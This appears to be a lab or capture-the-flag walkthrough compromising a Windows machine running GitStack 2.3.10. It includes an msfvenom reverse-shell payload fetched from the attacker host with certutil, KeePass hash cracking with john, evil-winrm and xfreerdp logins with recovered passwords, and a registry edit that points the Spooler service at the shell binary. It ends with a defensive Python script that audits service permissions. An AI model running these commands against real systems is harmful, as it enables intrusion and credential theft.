Walkthrough Stack
After a period of regular privilege escalation attempts, I realized that I had made a mistake, but it also left me more impressed and eager to try.
Seriously, you'll find it fun
machine ip : 172.31.1.12
my ip : 10.10.0.33
Port information
172.31.1.12:80 Open
172.31.1.12:135 Open
172.31.1.12:139 Open
172.31.1.12:445 Open
172.31.1.12:3389 Open
172.31.1.12:5985 Open
172.31.1.12:47001 Open
172.31.1.12:49152 Open
172.31.1.12:49153 Open
172.31.1.12:49154 Open
172.31.1.12:49155 Open
172.31.1.12:49162 Open
172.31.1.12:49163 Open
172.31.1.12:49164 Open
The first thing I do is test ports 135, 139 and 445 for anonymous access, looking for shared folders or usernames, but nothing can be found. So I view the website on port 80.
This is a Django website, and we can find three routes. We can log in to /gitstack/ with the default credentials, and the fingerprint shows GitStack 2.3.10.
searchsploit gitstack 2.3.10
The foothold
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.33 LPORT=23 -f exe -o rev.exe
Edit the exploit's payload: first command = "whoami" to confirm execution, then
command = "certutil -urlcache -split -f http://10.10.0.33/rev.exe"
and run it again with command = "rev.exe" to get a shell as john (user owned).
access.txt : reb656565983289247427842gtamf6
Privilege to Administrator
Running the systeminfo command shows the machine has 202 patches, and for this reason I wasted some time trying to bypass patch fixes; I will mention it in the Beyond root section.
Running winpeas shows it has a KeePass profile.
I installed KeePass on my Windows machine and found the database needs a password.
I tried KeeFarce first to get the password, but it didn't work.
So I use keepass2john to crack it:
keepass2john pass.kdbx >> hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show hash
The password is princess, so now we can open the kdbx file.
Copy the stored password out of it: the password is secur3_apass262. So use evil-winrm to log in:
evil-winrm -i 172.31.1.12 -u 'administrator' -p 'secur3_apass262'
Beyond root
As mentioned earlier, I wasted a lot of time trying to bypass patch fixes, so once I got administrator I logged in and changed the remote settings to let john log in, because I wanted to see whether the exploit really does not work.
xfreerdp /u:administrator /p:secur3_apass262 /v:172.31.1.12
xfreerdp /u:john /p:s3cret123SEc /v:172.31.1.12
When I run beRoot.exe, I can find a service named spooler. This service is a vulnerable service, but it is not running. Even though we can modify the registry, we don't have permission to reboot.
reg add HKLM\SYSTEM\CurrentControlSet\Services\Spooler /v ImagePath /t REG_EXPAND_SZ /d C:\users\john\desktop\rev.exe /f
sc qc spooler -> we can see it runs as LocalSystem
sc sdshow spooler
SY means LocalSystem
RP means start service
WP means stop service
So even if we change the service binary via the registry, we still can't restart it.
But what we can do is elevate administrator to SYSTEM, lol.
If we can run "sc start spooler", we get a SYSTEM shell.
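To audit this on other services from a defender's side, here is an added Python example (not from the original walkthrough) that parses the SDDL string that sc sdshow prints and reports which trustees hold the RP (start), WP (stop) and DC (change config) rights; the helper names and the two sample descriptors are constructed for illustration, not captured from the machine.

```python
"""Audit the DACL printed by `sc sdshow <service>` (SDDL form): list who may
start/stop/reconfigure the service and flag low-privileged groups that can."""
import re

TRUSTEE = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive Users",
           "SU": "Service Logon", "AU": "Authenticated Users", "BU": "Users",
           "WD": "Everyone", "AN": "Anonymous"}
RIGHTS = {"RP": "start", "WP": "stop", "DC": "change_config",
          "WD": "write_dac", "WO": "write_owner", "GA": "generic_all"}
LOW_PRIV = {"AU", "BU", "IU", "WD", "AN"}   # groups any logged-on user is in

# ACE layout: (type;flags;rights;object_guid;inherit_guid;trustee)
ACE_RE = re.compile(r"\(([AD]);[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)")

def parse_dacl(sddl):
    """Return [(ace_type, rights_set, trustee)] from the D: section only."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for ace_type, rights, trustee in ACE_RE.findall(m.group(1)):
        # rights are two-letter codes; a raw hex mask is left unresolved here
        codes = set() if rights.startswith("0x") else set(re.findall(r"[A-Z]{2}", rights))
        aces.append((ace_type, codes, trustee))
    return aces

def who_can(sddl, right):
    """Trustees explicitly allowed the given SDDL right code, e.g. 'RP'."""
    return sorted(TRUSTEE.get(t, t) for kind, codes, t in parse_dacl(sddl)
                  if kind == "A" and (right in codes or "GA" in codes))

def weak_aces(sddl):
    """Allow-ACEs that give a low-privileged group any start/stop/config right."""
    hits = []
    for kind, codes, t in parse_dacl(sddl):
        if kind == "A" and t in LOW_PRIV:
            granted = sorted(RIGHTS[c] for c in codes if c in RIGHTS)
            if granted:
                hits.append((TRUSTEE[t], granted))
    return hits

# Constructed sample resembling a stock Spooler descriptor: only SY/BA hold RP/WP
SPOOLER_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed sample of a misconfigured service: Authenticated Users may restart it
WEAK_SDDL = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;RPWPDC;;;AU)"

if __name__ == "__main__":
    print("can start Spooler:", who_can(SPOOLER_SDDL, "RP"))
    print("weak ACEs:", weak_aces(WEAK_SDDL))
```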
Finally, I want to remember that I actually spent an hour and a half trying to bypass the patch, "a fool".